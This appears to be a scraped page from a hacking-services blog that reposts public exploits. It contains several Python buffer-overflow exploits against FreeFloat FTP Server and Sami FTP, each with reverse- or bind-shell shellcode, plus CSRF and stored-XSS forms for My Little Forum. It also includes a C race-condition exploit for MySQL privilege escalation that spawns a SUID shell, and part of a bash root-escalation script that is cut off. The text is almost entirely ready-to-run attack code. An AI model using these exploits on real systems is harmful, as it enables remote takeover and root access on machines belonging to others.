#!/usr/bin/env python
#-*- coding: utf-8 -*-
# Exploit Title: FreeFloat FTP Server HOST Command Buffer Overflow Exploit
# Date: 30/10/2016
# Exploit Author: Cybernetic
# Software Link: http://www.freefloat.com/software/freefloatftpserver.zip
# Version: 1.00
# Tested on: Windows XP Profesional SP3 ESP x86
# CVE : N/A
import socket, os, sys
ret="\xC7\x31\x6B\x7E" #Shell32.dll 7E6B31C7
#Metasploit Shellcode
#msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 -b '\x00\x0a\x0d' -f c
#nc -lvp 443
#Send exploit
shellcode=("\xbb\x89\x62\x48\xda\xdb\xda\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"
"\x52\x31\x5a\x12\x03\x5a\x12\x83\x4b\x66\xaa\x2f\xb7\x8f\xa8"
"\xd0\x47\x50\xcd\x59\xa2\x61\xcd\x3e\xa7\xd2\xfd\x35\xe5\xde"
"\x76\x1b\x1d\x54\xfa\xb4\x12\xdd\xb1\xe2\x1d\xde\xea\xd7\x3c"
"\x5c\xf1\x0b\x9e\x5d\x3a\x5e\xdf\x9a\x27\x93\x8d\x73\x23\x06"
"\x21\xf7\x79\x9b\xca\x4b\x6f\x9b\x2f\x1b\x8e\x8a\xfe\x17\xc9"
"\x0c\x01\xfb\x61\x05\x19\x18\x4f\xdf\x92\xea\x3b\xde\x72\x23"
"\xc3\x4d\xbb\x8b\x36\x8f\xfc\x2c\xa9\xfa\xf4\x4e\x54\xfd\xc3"
"\x2d\x82\x88\xd7\x96\x41\x2a\x33\x26\x85\xad\xb0\x24\x62\xb9"
"\x9e\x28\x75\x6e\x95\x55\xfe\x91\x79\xdc\x44\xb6\x5d\x84\x1f"
"\xd7\xc4\x60\xf1\xe8\x16\xcb\xae\x4c\x5d\xe6\xbb\xfc\x3c\x6f"
"\x0f\xcd\xbe\x6f\x07\x46\xcd\x5d\x88\xfc\x59\xee\x41\xdb\x9e"
"\x11\x78\x9b\x30\xec\x83\xdc\x19\x2b\xd7\x8c\x31\x9a\x58\x47"
"\xc1\x23\x8d\xc8\x91\x8b\x7e\xa9\x41\x6c\x2f\x41\x8b\x63\x10"
"\x71\xb4\xa9\x39\x18\x4f\x3a\x86\x75\x4e\xde\x6e\x84\x50\x1f"
"\xd4\x01\xb6\x75\x3a\x44\x61\xe2\xa3\xcd\xf9\x93\x2c\xd8\x84"
"\x94\xa7\xef\x79\x5a\x40\x85\x69\x0b\xa0\xd0\xd3\x9a\xbf\xce"
"\x7b\x40\x2d\x95\x7b\x0f\x4e\x02\x2c\x58\xa0\x5b\xb8\x74\x9b"
"\xf5\xde\x84\x7d\x3d\x5a\x53\xbe\xc0\x63\x16\xfa\xe6\x73\xee"
"\x03\xa3\x27\xbe\x55\x7d\x91\x78\x0c\xcf\x4b\xd3\xe3\x99\x1b"
"\xa2\xcf\x19\x5d\xab\x05\xec\x81\x1a\xf0\xa9\xbe\x93\x94\x3d"
"\xc7\xc9\x04\xc1\x12\x4a\x34\x88\x3e\xfb\xdd\x55\xab\xb9\x83"
"\x65\x06\xfd\xbd\xe5\xa2\x7e\x3a\xf5\xc7\x7b\x06\xb1\x34\xf6"
"\x17\x54\x3a\xa5\x18\x7d")
shell= '\x90'*30 + shellcode
buffer='\x41'*247 + ret + shell + '\x43'*(696-len(shell))
print "Sending Buffer"
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(('10.10.10.10',21))
s.recv(1024)
s.send('USER test \r\n')
s.recv(1024)
s.send('PASS test \r\n')
s.recv(1024)
s.send('HOST' +buffer+ '\r\n')
s.close()
print "Attack Buffer Overflow Successfully Executed"
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863291412
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import socket
#Exploit Title: FreeFloat FTP Server Buffer Overflow RMD command
#Date: 29 Octubre 2016
#Exploit Author: Karri93
#Software Link: http://www.freefloat.com/software/freefloatftpserver.zip
#Version: 1.0
#Tested on: Windows XP Profesional SP3 Spanish x86
#Shellcode Metasploit:
#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.7 LPORT=443 -b '\x00\x0A\x0D' -f -c
#nc -lvp 443
ret= "\x2F\x1D\xF1\x77" #GDI32.dll
shellcode=("\xd9\xc4\xd9\x74\x24\xf4\x5b\x33\xc9\xb1\x52\xba\x9b\x84\x71"
"\xb0\x83\xc3\x04\x31\x53\x13\x03\xc8\x97\x93\x45\x12\x7f\xd1"
"\xa6\xea\x80\xb6\x2f\x0f\xb1\xf6\x54\x44\xe2\xc6\x1f\x08\x0f"
"\xac\x72\xb8\x84\xc0\x5a\xcf\x2d\x6e\xbd\xfe\xae\xc3\xfd\x61"
"\x2d\x1e\xd2\x41\x0c\xd1\x27\x80\x49\x0c\xc5\xd0\x02\x5a\x78"
"\xc4\x27\x16\x41\x6f\x7b\xb6\xc1\x8c\xcc\xb9\xe0\x03\x46\xe0"
"\x22\xa2\x8b\x98\x6a\xbc\xc8\xa5\x25\x37\x3a\x51\xb4\x91\x72"
"\x9a\x1b\xdc\xba\x69\x65\x19\x7c\x92\x10\x53\x7e\x2f\x23\xa0"
"\xfc\xeb\xa6\x32\xa6\x78\x10\x9e\x56\xac\xc7\x55\x54\x19\x83"
"\x31\x79\x9c\x40\x4a\x85\x15\x67\x9c\x0f\x6d\x4c\x38\x4b\x35"
"\xed\x19\x31\x98\x12\x79\x9a\x45\xb7\xf2\x37\x91\xca\x59\x50"
"\x56\xe7\x61\xa0\xf0\x70\x12\x92\x5f\x2b\xbc\x9e\x28\xf5\x3b"
"\xe0\x02\x41\xd3\x1f\xad\xb2\xfa\xdb\xf9\xe2\x94\xca\x81\x68"
"\x64\xf2\x57\x3e\x34\x5c\x08\xff\xe4\x1c\xf8\x97\xee\x92\x27"
"\x87\x11\x79\x40\x22\xe8\xea\xaf\x1b\xf3\xed\x47\x5e\xf3\xf0"
"\x2c\xd7\x15\x98\x42\xbe\x8e\x35\xfa\x9b\x44\xa7\x03\x36\x21"
"\xe7\x88\xb5\xd6\xa6\x78\xb3\xc4\x5f\x89\x8e\xb6\xf6\x96\x24"
"\xde\x95\x05\xa3\x1e\xd3\x35\x7c\x49\xb4\x88\x75\x1f\x28\xb2"
"\x2f\x3d\xb1\x22\x17\x85\x6e\x97\x96\x04\xe2\xa3\xbc\x16\x3a"
"\x2b\xf9\x42\x92\x7a\x57\x3c\x54\xd5\x19\x96\x0e\x8a\xf3\x7e"
"\xd6\xe0\xc3\xf8\xd7\x2c\xb2\xe4\x66\x99\x83\x1b\x46\x4d\x04"
"\x64\xba\xed\xeb\xbf\x7e\x1d\xa6\x9d\xd7\xb6\x6f\x74\x6a\xdb"
"\x8f\xa3\xa9\xe2\x13\x41\x52\x11\x0b\x20\x57\x5d\x8b\xd9\x25"
"\xce\x7e\xdd\x9a\xef\xaa")
buffer= '\x90'*30 + shellcode
buffer1= '\x41' * 248 + ret + buffer + '\x43'*(696-len(buffer))
print "Sending..."
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(('192.168.1.150',21))
s.recv(1024)
s.send('USER free\r\n')
s.recv(1024)
s.send('PASS free\r\n')
s.recv(1024)
s.send('RMD' + buffer1 + '\r\n')
s.close()
#!/usr/bin/env python
#-*- coding: utf-8 -*-
# Exploit Title: FreeFloat FTP Server BoF ABOR Command
# Date: 29/10/2016
# Exploit Author: Ger
# Software Link: http://www.freefloat.com/software/freefloatftpserver.zip
# Version: 1.0
# Tested on: Windows XP Profesional V. 2002 Service Pack 3
# CVE : n/a
import socket
#shellcode with metasploit
#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.74.132 LPORT=443 -b '\x00\x0d\x0a' -f c
#nc -lvp 443
#send the exploit
ret='\x73\x18\x6E\x74' #MSCTF.dll
shellcode=("\xdd\xc6\xd9\x74\x24\xf4\x5d\xb8\x2a\xb4\x5a\x74\x29\xc9\xb1"
"\x52\x31\x45\x17\x03\x45\x17\x83\xef\xb0\xb8\x81\x13\x50\xbe"
"\x6a\xeb\xa1\xdf\xe3\x0e\x90\xdf\x90\x5b\x83\xef\xd3\x09\x28"
"\x9b\xb6\xb9\xbb\xe9\x1e\xce\x0c\x47\x79\xe1\x8d\xf4\xb9\x60"
"\x0e\x07\xee\x42\x2f\xc8\xe3\x83\x68\x35\x09\xd1\x21\x31\xbc"
"\xc5\x46\x0f\x7d\x6e\x14\x81\x05\x93\xed\xa0\x24\x02\x65\xfb"
"\xe6\xa5\xaa\x77\xaf\xbd\xaf\xb2\x79\x36\x1b\x48\x78\x9e\x55"
"\xb1\xd7\xdf\x59\x40\x29\x18\x5d\xbb\x5c\x50\x9d\x46\x67\xa7"
"\xdf\x9c\xe2\x33\x47\x56\x54\x9f\x79\xbb\x03\x54\x75\x70\x47"
"\x32\x9a\x87\x84\x49\xa6\x0c\x2b\x9d\x2e\x56\x08\x39\x6a\x0c"
"\x31\x18\xd6\xe3\x4e\x7a\xb9\x5c\xeb\xf1\x54\x88\x86\x58\x31"
"\x7d\xab\x62\xc1\xe9\xbc\x11\xf3\xb6\x16\xbd\xbf\x3f\xb1\x3a"
"\xbf\x15\x05\xd4\x3e\x96\x76\xfd\x84\xc2\x26\x95\x2d\x6b\xad"
"\x65\xd1\xbe\x62\x35\x7d\x11\xc3\xe5\x3d\xc1\xab\xef\xb1\x3e"
"\xcb\x10\x18\x57\x66\xeb\xcb\x98\xdf\xb9\x8f\x71\x22\x3d\x91"
"\x3a\xab\xdb\xfb\x2c\xfa\x74\x94\xd5\xa7\x0e\x05\x19\x72\x6b"
"\x05\x91\x71\x8c\xc8\x52\xff\x9e\xbd\x92\x4a\xfc\x68\xac\x60"
"\x68\xf6\x3f\xef\x68\x71\x5c\xb8\x3f\xd6\x92\xb1\xd5\xca\x8d"
"\x6b\xcb\x16\x4b\x53\x4f\xcd\xa8\x5a\x4e\x80\x95\x78\x40\x5c"
"\x15\xc5\x34\x30\x40\x93\xe2\xf6\x3a\x55\x5c\xa1\x91\x3f\x08"
"\x34\xda\xff\x4e\x39\x37\x76\xae\x88\xee\xcf\xd1\x25\x67\xd8"
"\xaa\x5b\x17\x27\x61\xd8\x27\x62\x2b\x49\xa0\x2b\xbe\xcb\xad"
"\xcb\x15\x0f\xc8\x4f\x9f\xf0\x2f\x4f\xea\xf5\x74\xd7\x07\x84"
"\xe5\xb2\x27\x3b\x05\x97")
buffer='\x90'*20 + shellcode
buffer1='\x41'*247 + ret + buffer + '\x43'*(696-len(buffer))
print "Sending Buffer"
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(('192.168.74.133', 21))
s.recv(1024)
s.send('USER anonymous\r\n')
s.recv(1024)
s.send('PASS anonymous\r\n')
s.recv(1024)
s.send('ABOR' + buffer1 + '\r\n')
s.close()
#/usr/bin/python
#-*- Coding: utf-8 -*-
### Sami FTP Server 2.0.2- SEH Overwrite, Buffer Overflow by n30m1nd ###
# Date: 2016-01-11
# Exploit Author: n30m1nd
# Vendor Homepage: http://www.karjasoft.com/
# Software Link: http://www.karjasoft.com/files/samiftp/samiftpd_install.exe
# Version: 2.0.2
# Tested on: Win7 64bit and Win10 64 bit
# Credits
# =======
# Thanks to PHRACK for maintaining all the articles up for so much time...
# These are priceless and still current for exploit development!!
# Shouts to the crew at Offensive Security for their huge efforts on making the infosec community better
# How to
# ======
# * Open Sami FTP Server and open its graphical interface
# * Run this python script and write the IP to attack
# * Connect to the same IP on port 4444
#
# BONUS
# =====
# Since the program will write the data into its (SamiFTP.binlog) logs it will try to load these logs on each
# start and so, it will crash and run our shellcode everytime it starts.
# Why?
# ====
# The graphical interface tries to show the user name which produces an overflow overwriting SEH
# Exploit code
# ============
import socket
import struct
def doHavoc(ipaddr):
# Bad chars: 00 0d 0a ff
alignment = "\x90"*3
jmpfront = "345A7504".decode('hex')
#CPU Disasm
#Hex dump Command
# 34 5A XOR AL,5A
# 75 04 JNE SHORT +04
# pop pop ret in tmp01.dll
popret = 0x10022ADE
# fstenv trick to get eip: phrack number 62
# and store it into EAX for the metasploit shell (BufferRegister)
getEIPinEAX = "D9EED934E48B44E40C040b".decode('hex')
#CPU Disasm
#Hex dump Command
# D9EE FLDZ
# D934E4 FSTENV SS:[ESP]
# 8B44E4 0C MOV EAX,DWORD PTR SS:[ESP+0C]
# 04 0B ADD AL,0B
# Bind shellcode on port 4444 - alpha mixed BufferRegister=EAX
shellcode = (
getEIPinEAX +
"PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIylm8mRS0UP7p"
"e0K9jEDqYPU4Nk60VPlKCbdLnkbrWdLKqb4hfoNWczEvdqyoNLElpaalC2dl10kq"
"xO6mEQ9WxbjRf22wNkf220lKsz5lNkblr1sHxcsxGqZqcaLK0YQ05QiCNkCyB8Hc"
"VZ1Ynk5dlKEQyF01IoNLYQHOvm31yW6X9pRUXvwsSMIhgKqmDdT5KTf8NkaHWTEQ"
"yCavNkDLBklKbx7lgqN3nkC4nkuQXPk9w47Tq4skaKsQV9pZPQkOYpcosobzNkWb"
"8kNmSmbH5cP2C0Wpu8Qgd3UbCof4e80LD7ev379oyElxlP31GpWpFIo4V4bpCXa9"
"op2KePyohURJFhPY0P8bimw0pPG0rpu8xjDOYOipYoiEj7QxWrC0wa3lmYZFbJDP"
"qFqGCXYRIKDw3WkOZuv7CXNWkYehKOkOiEaGPhD4HlwKm1KOhUQGJ7BHRUpnrmqq"
"Iokee83S2McT30oyXcQGV767FQIfcZfrv9PVYrImQvKwG4DdelvaGqLM0D5tDPO6"
"GpRd0T602vaFF6w666rnqFsf2sPV0h2YzleoovYoXUK9kPrnSfPFYo00Ph7xk7wm"
"sPYoKeMkxplulb2vsXoVmEOMomKO9EgL4FCLFjk0YkM0qec5Mkg7FsD2ROqzGpv3"
"ioJuAA"
)
# Final payload, SEH overwrite ocurrs at 600 bytes
payload = alignment + "."*(600-len(alignment)-len(jmpfront)) + jmpfront + struct.pack("<L", popret) + shellcode
try:
s = socket.create_connection((ipaddr, 21))
s.send("USER "+ payload +"\r\n" )
print s.recv(4096)
s.send("PASS "+ payload +"\r\n" )
print s.recv(4096)
print s.recv(4096)
except e:
print str(e)
exit("[+] Couldn't connect")
if __name__ == "__main__":
ipaddr = raw_input("[+] IP: ")
doHavoc(ipaddr)
while raw_input("[?] Got shell?(y/n) ").lower() == "n":
doHavoc(ipaddr)
print "[+] Enjoy..."
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Exploit Title: FreeFloat FTP Server RENAME Command Buffer Overflow Exploit
# Date: 29/10/2016
# Exploit Author: Eagleblack
# Software Link: http://www.freefloat.com/software/freefloatftpserver.zip
# Version: 1.00
# Tested on: Windows XP Profesional SP3 Spanish version x86
# CVE : N/A
#Description: FreeFloat FTP server allow login as root without a user and password, this vulnerability allow to an attacker login and send a
# long chain of characters that overflow the buffer, when the attacker knows the exact number that overwritten the EIP registry
# he can take possession of the application and send a malicious code (payload) to the ESP stack pointer that allow obtain
# a remote code execution on the system that is running the FTP Server, in this case Windows XP.
import socket
ret = "\x5B\x96\xDC\x77" #ADVAPI32.dll this dll have a jump to ESP stack pointer
#Metasploit shellcode:
#msfvenom -p windows/shell_reverse_tcp LHOST='IP address Local host' LPORT='' -b '\x00\x0a\x0d' -f c
shellcode = ("\xd9\xe5\xba\x7e\xd1\x2c\x95\xd9\x74\x24\xf4\x58\x33\xc9\xb1"
"\x52\x31\x50\x17\x83\xe8\xfc\x03\x2e\xc2\xce\x60\x32\x0c\x8c"
"\x8b\xca\xcd\xf1\x02\x2f\xfc\x31\x70\x24\xaf\x81\xf2\x68\x5c"
"\x69\x56\x98\xd7\x1f\x7f\xaf\x50\x95\x59\x9e\x61\x86\x9a\x81"
"\xe1\xd5\xce\x61\xdb\x15\x03\x60\x1c\x4b\xee\x30\xf5\x07\x5d"
"\xa4\x72\x5d\x5e\x4f\xc8\x73\xe6\xac\x99\x72\xc7\x63\x91\x2c"
"\xc7\x82\x76\x45\x4e\x9c\x9b\x60\x18\x17\x6f\x1e\x9b\xf1\xa1"
"\xdf\x30\x3c\x0e\x12\x48\x79\xa9\xcd\x3f\x73\xc9\x70\x38\x40"
"\xb3\xae\xcd\x52\x13\x24\x75\xbe\xa5\xe9\xe0\x35\xa9\x46\x66"
"\x11\xae\x59\xab\x2a\xca\xd2\x4a\xfc\x5a\xa0\x68\xd8\x07\x72"
"\x10\x79\xe2\xd5\x2d\x99\x4d\x89\x8b\xd2\x60\xde\xa1\xb9\xec"
"\x13\x88\x41\xed\x3b\x9b\x32\xdf\xe4\x37\xdc\x53\x6c\x9e\x1b"
"\x93\x47\x66\xb3\x6a\x68\x97\x9a\xa8\x3c\xc7\xb4\x19\x3d\x8c"
"\x44\xa5\xe8\x03\x14\x09\x43\xe4\xc4\xe9\x33\x8c\x0e\xe6\x6c"
"\xac\x31\x2c\x05\x47\xc8\xa7\xea\x30\xd3\x30\x83\x42\xd3\x3f"
"\xe8\xca\x35\x55\x1e\x9b\xee\xc2\x87\x86\x64\x72\x47\x1d\x01"
"\xb4\xc3\x92\xf6\x7b\x24\xde\xe4\xec\xc4\x95\x56\xba\xdb\x03"
"\xfe\x20\x49\xc8\xfe\x2f\x72\x47\xa9\x78\x44\x9e\x3f\x95\xff"
"\x08\x5d\x64\x99\x73\xe5\xb3\x5a\x7d\xe4\x36\xe6\x59\xf6\x8e"
"\xe7\xe5\xa2\x5e\xbe\xb3\x1c\x19\x68\x72\xf6\xf3\xc7\xdc\x9e"
"\x82\x2b\xdf\xd8\x8a\x61\xa9\x04\x3a\xdc\xec\x3b\xf3\x88\xf8"
"\x44\xe9\x28\x06\x9f\xa9\x59\x4d\xbd\x98\xf1\x08\x54\x99\x9f"
"\xaa\x83\xde\x99\x28\x21\x9f\x5d\x30\x40\x9a\x1a\xf6\xb9\xd6"
"\x33\x93\xbd\x45\x33\xb6")
buffer = '\x41'* 245 + ret + '\x90'* 30 + shellcode #EIP overwritten at offset 245
print "Sending Buffer"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #open socket
connect = s.connect(('192.168.1.13',21)) #IP address and port (21) from the target
s.recv(1024) #FTPBanner
s.send('USER \r\n') #Sending USER (Null user)
s.recv(1024)
s.send('PASS \r\n') #Sending Password (Null password)
s.recv(1024)
s.send('RENAME' + buffer +'\r\n')
s.close()
Title:
======
My Little Forum 2.3.7 - Multiple Vulnerability
Product & Service Introduction:
===============================
My little forum is a simple PHP and MySQL based internet forum that
displays the messages in classical threaded view (tree structure). It is
Open Source licensed under the GNU General Public License. The main
claim of this web forum is simplicity. Furthermore it should be easy to
install and run on a standard server configuration with PHP and MySQL.
Software Link:
==============
https://github.com/ilosuna/mylittleforum/archive/master.zip
Vulnerability Type:
=========================
Cross-Site Request Forgery
Stored Cross-Site Scripting
CSRF Allow To Backup Disclosure
Vulnerability Details:
==============================
This WebApplication is vulnerable and suffer from some vulnerablity.
Severity Level:
===============
High
Proof of Concept (PoC):
=======================
1. CSRF (Add Page)
With this exploit can add page in webapp.
<form
action="http://localhost/mylittleforum-master/index.php?mode=admin&action=edit_page"
method="post" accept-charset="utf-8">
<input type="hidden" name="mode" value="admin">
<input type="hidden" name="title" value="Title">
<input type="hidden" name="content" value="Content">
<input type="hidden" name="menu_linkname" value="Name">
<input type="submit" name="edit_page_submit" value="OK - Save page">
</form>
2. Stored XSS:
<form
action="http://localhost/mylittleforum-master/index.php?mode=admin&action=edit_page"
method="post" accept-charset="utf-8">
<input type="hidden" name="mode" value="admin">
<input type="hidden" name="title" value="Stored XSS
<script>alert(1)</script>">
<input type="hidden" name="content" value="Stored XSS
<script>alert(2)</script>">
<input type="hidden" name="menu_linkname" value="Stored XSS
<script>alert(3)</script>">
<input type="submit" name="edit_page_submit" value="OK - Save page">
</form>
3. Backup Disclosure:
with this exploit we can delect htaccess in backup folder for access to
backups.
<form action="http://localhost/mylittleforum-master/index.php"
method="post" accept-charset="utf-8">
<div>
<input type="hidden" name="mode" value="admin">
<input type="hidden" name="delete_backup_files[]" value=".htaccess">
<input type="submit" name="delete_backup_files_confirm" value="OK -
Delete">
</div>
</form>
Next use exploit go to:
http://localhost/mylittleforum-master/backup/
Author:
==================
Ashiyane Digital Security Team
/*
Source: https://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html // http://legalhackers.com/exploits/CVE-2016-6663/mysql-privesc-race.c
MySQL/PerconaDB/MariaDB - Privilege Escalation / Race Condition PoC Exploit
mysql-privesc-race.c (ver. 1.0)
CVE-2016-6663 / OCVE-2016-5616
Discovered/Coded by:
Dawid Golunski
dawid[at]legalhackers.com
https://legalhackers.com
Follow https://twitter.com/dawid_golunski for updates on this advisory.
Compile:
gcc mysql-privesc-race.c -o mysql-privesc-race -I/usr/include/mysql -lmysqlclient
Note:
* On RedHat-based systems you might need to change /tmp to another public directory (e.g. /uploads)
* For testing purposes only. Do no harm.
Full advisory URL:
https://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html
Video PoC:
https://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html
*/
#include <fcntl.h>
#include <grp.h>
#include <mysql.h>
#include <pwd.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/inotify.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>
#define EXP_PATH "/tmp/mysql_privesc_exploit"
#define EXP_DIRN "mysql_privesc_exploit"
#define MYSQL_TAB_FILE EXP_PATH "/exploit_table.MYD"
#define MYSQL_TEMP_FILE EXP_PATH "/exploit_table.TMD"
#define SUID_SHELL EXP_PATH "/mysql_suid_shell.MYD"
#define MAX_DELAY 1000 // can be used in the race to adjust the timing if necessary
MYSQL *conn; // DB handles
MYSQL_RES *res;
MYSQL_ROW row;
unsigned long cnt;
void intro() {
printf(
"\033[94m\n"
"MySQL/PerconaDB/MariaDB - Privilege Escalation / Race Condition PoC Exploit\n"
"mysql-privesc-race.c (ver. 1.0)\n\n"
"CVE-2016-6663 / OCVE-2016-5616\n\n"
"For testing purposes only. Do no harm.\n\n"
"Discovered/Coded by:\n\n"
"Dawid Golunski \n"
"http://legalhackers.com"
"\033[0m\n\n");
}
void usage(char *argv0) {
intro();
printf("Usage:\n\n%s user pass db_host database\n\n", argv0);
}
void mysql_cmd(char *sql_cmd, int silent) {
if (!silent) {
printf("%s \n", sql_cmd);
}
if (mysql_query(conn, sql_cmd)) {
fprintf(stderr, "%s\n", mysql_error(conn));
exit(1);
}
res = mysql_store_result(conn);
if (res>0) mysql_free_result(res);
}
int main(int argc,char **argv)
{
int randomnum = 0;
int io_notified = 0;
int myd_handle;
int wpid;
int is_shell_suid=0;
pid_t pid;
int status;
struct stat st;
/* io notify */
int fd;
int ret;
char buf[4096] __attribute__((aligned(8)));
int num_read;
struct inotify_event *event;
/* credentials */
char *user = argv[1];
char *password = argv[2];
char *db_host = argv[3];
char *database = argv[4];
// Disable buffering of stdout
setvbuf(stdout, NULL, _IONBF, 0);
// Get the params
if (argc!=5) {
usage(argv[0]);
exit(1);
}
intro();
// Show initial privileges
printf("\n[+] Starting the exploit as: \n");
system("id");
// Connect to the database server with provided credentials
printf("\n[+] Connecting to the database `%s` as %s@%s\n", database, user, db_host);
conn = mysql_init(NULL);
if (!mysql_real_connect(conn, db_host, user, password, database, 0, NULL, 0)) {
fprintf(stderr, "%s\n", mysql_error(conn));
exit(1);
}
// Prepare tmp dir
printf("\n[+] Creating exploit temp directory %s\n", "/tmp/" EXP_DIRN);
umask(000);
system("rm -rf /tmp/" EXP_DIRN " && mkdir /tmp/" EXP_DIRN);
system("chmod g+s /tmp/" EXP_DIRN );
// Prepare exploit tables :)
printf("\n[+] Creating mysql tables \n\n");
mysql_cmd("DROP TABLE IF EXISTS exploit_table", 0);
mysql_cmd("DROP TABLE IF EXISTS mysql_suid_shell", 0);
mysql_cmd("CREATE TABLE exploit_table (txt varchar(50)) engine = 'MyISAM' data directory '" EXP_PATH "'", 0);
mysql_cmd("CREATE TABLE mysql_suid_shell (txt varchar(50)) engine = 'MyISAM' data directory '" EXP_PATH "'", 0);
// Copy /bin/bash into the mysql_suid_shell.MYD mysql table file
// The file should be owned by mysql:attacker thanks to the sticky bit on the table directory
printf("\n[+] Copying bash into the mysql_suid_shell table.\n After the exploitation the following file/table will be assigned SUID and executable bits : \n");
system("cp /bin/bash " SUID_SHELL);
system("ls -l " SUID_SHELL);
// Use inotify to get the timing right
fd = inotify_init();
if (fd < 0) {
printf("failed to inotify_init\n");
return -1;
}
ret = inotify_add_watch(fd, EXP_PATH, IN_CREATE | IN_CLOSE);
/* Race loop until the mysql_suid_shell.MYD table file gets assigned SUID+exec perms */
printf("\n[+] Entering the race loop... Hang in there...\n");
while ( is_shell_suid != 1 ) {
cnt++;
if ( (cnt % 100) == 0 ) {
printf("->");
//fflush(stdout);
}
/* Create empty file , remove if already exists */
unlink(MYSQL_TEMP_FILE);
unlink(MYSQL_TAB_FILE);
mysql_cmd("DROP TABLE IF EXISTS exploit_table", 1);
mysql_cmd("CREATE TABLE exploit_table (txt varchar(50)) engine = 'MyISAM' data directory '" EXP_PATH "'", 1);
/* random num if needed */
srand ( time(NULL) );
randomnum = ( rand() % MAX_DELAY );
// Fork, to run the query asynchronously and have time to replace table file (MYD) with a symlink
pid = fork();
if (pid < 0) {
fprintf(stderr, "Fork failed :(\n");
}
/* Child process - executes REPAIR TABLE SQL statement */
if (pid == 0) {
usleep(500);
unlink(MYSQL_TEMP_FILE);
mysql_cmd("REPAIR TABLE exploit_table EXTENDED", 1);
// child stops here
exit(0);
}
/* Parent process - aims to replace the temp .tmd table with a symlink before chmod */
if (pid > 0 ) {
io_notified = 0;
while (1) {
int processed = 0;
ret = read(fd, buf, sizeof(buf));
if (ret < 0) {
break;
}
while (processed < ret) {
event = (struct inotify_event *)(buf + processed);
if (event->mask & IN_CLOSE) {
if (!strcmp(event->name, "exploit_table.TMD")) {
//usleep(randomnum);
// Set the .MYD permissions to suid+exec before they get copied to the .TMD file
unlink(MYSQL_TAB_FILE);
myd_handle = open(MYSQL_TAB_FILE, O_CREAT, 0777);
close(myd_handle);
chmod(MYSQL_TAB_FILE, 04777);
// Replace the temp .TMD file with a symlink to the target sh binary to get suid+exec
unlink(MYSQL_TEMP_FILE);
symlink(SUID_SHELL, MYSQL_TEMP_FILE);
io_notified=1;
}
}
processed += sizeof(struct inotify_event);
}
if (io_notified) {
break;
}
}
waitpid(pid, &status, 0);
}
// Check if SUID bit was set at the end of this attempt
if ( lstat(SUID_SHELL, &st) == 0 ) {
if (st.st_mode & S_ISUID) {
is_shell_suid = 1;
}
}
}
printf("\n\n[+] \033[94mBingo! Race won (took %lu tries) !\033[0m Check out the \033[94mmysql SUID shell\033[0m: \n\n", cnt);
system("ls -l " SUID_SHELL);
printf("\n[+] Spawning the \033[94mmysql SUID shell\033[0m now... \n Remember that from there you can gain \033[1;31mroot\033[0m with vuln \033[1;31mCVE-2016-6662\033[0m or \033[1;31mCVE-2016-6664\033[0m :)\n\n");
system(SUID_SHELL " -p -i ");
//system(SUID_SHELL " -p -c '/bin/bash -i -p'");
/* close MySQL connection and exit */
printf("\n[+] Job done. Exiting\n\n");
mysql_close(conn);
return 0;
}
#!/bin/bash -p
#
# Source: https://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html // http://legalhackers.com/exploits/CVE-2016-6664/mysql-chowned.sh
#
# MySQL / MariaDB / PerconaDB - Root Privilege Escalation PoC Exploit
# mysql-chowned.sh (ver. 1.0)
#
# CVE-2016-6664 / OCVE-2016-5617
#
# Discovered and coded by:
#
# Dawid Golunski
# dawid[at]legalhackers.com
#
# https://legalhackers.com
#
# Follow https://twitter.com/dawid_golunski for updates on this advisory.
#
# This PoC exploit allows attackers to (instantly) escalate their privileges
# from mysql system account to root through unsafe error log handling.
# The exploit requires that file-based logging has been configured (default).
# To confirm that syslog logging has not been enabled instead use:
# grep -r syslog /etc/mysql
# which should return no results.
#
# This exploit can be chained with the following vulnerability:
# CVE-2016-6663 / OCVE-2016-5616
# which allows attackers to gain access to mysql system account (mysql shell).
#
# In case database server has been configured with syslog you may also use:
# CVE-2016-6662 as an alternative to this exploit.
#
# Usage:
# ./mysql-chowned.sh path_to_error.log
#
#
# See the full advisory for details at:
# https://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html
#
# Video PoC:
# https://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html
#
#
# Disclaimer:
# For testing purposes only. Do no harm.
#
BACKDOORSH="/bin/bash"
BACKDOORPATH="/tmp/mysqlrootsh"
PRIVESCLIB="/tmp/privesclib.so"
PRIVESCSRC="/tmp/privesclib.c"
SUIDBIN="/usr/bin/sudo"
function cleanexit {
# Cleanup
echo -e "\n[+] Cleaning up..."
rm -f $PRIVESCSRC
rm -f $PRIVESCLIB
rm -f $ERRORLOG
touch $ERRORLOG
if [ -f /etc/ld.so.preload ]; then
echo -n > /etc/ld.so.preload
fi
echo -e "\n[+] Job done. Exiting with code $1 \n"
exit $1
